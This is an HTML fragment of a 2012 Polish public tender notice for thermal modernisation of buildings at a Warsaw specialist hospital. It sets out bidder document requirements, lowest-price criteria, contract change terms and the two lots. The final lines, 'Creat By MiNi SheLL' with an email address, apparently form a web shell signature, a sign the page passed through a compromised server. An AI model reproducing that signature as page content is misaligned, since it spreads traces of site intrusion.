</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dowód wniesienia/wpłacenia wadium.
2. Kosztorysy ofertowe.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Wszelkie zmiany i uzupełnienia do niniejszej umowy mogą być dokonane za zgodą obu stron  wyrażoną na piśmie pod rygorem nieważności.
2.  Strony dopuszczają możliwość zmian umowy w następujących przypadkach:
2.1	Zmiana Stron umowy.
2.2  Zmiana banków lub numerów kont bankowych Stron.
2.3  Zmiana stawek podatku VAT.
3. Zmniejszenie wartości umowy wynikające z robót niewykonanych lub zmiana zakresu  
           rzeczowego (nie zwiększająca ogólnej wartości umowy)
4. Zmiana przedstawicielstwa umawiających się stron wyszczególnionych w § 5 niniejszej umowy, oraz zmiana kierownika budowy wykazanego w § 7 niniejszej umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mssw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Międzyleski Szpital Specjalistyczny w Warszawie 
Dział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.09.2012 godzina 12:00, miejsce: Kancelaria Międzyleskiego Szpitala Specjalistycznego w Warszawie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Termomodernizację budynku głównego-część B i C  oraz łączników Miedzyleskiego Szpitala Specjalistycznego w Warszawie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.41.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Termomodernizację budynku D Miedzyleskiego Szpitala Specjalistycznego w Warszawie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.41.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com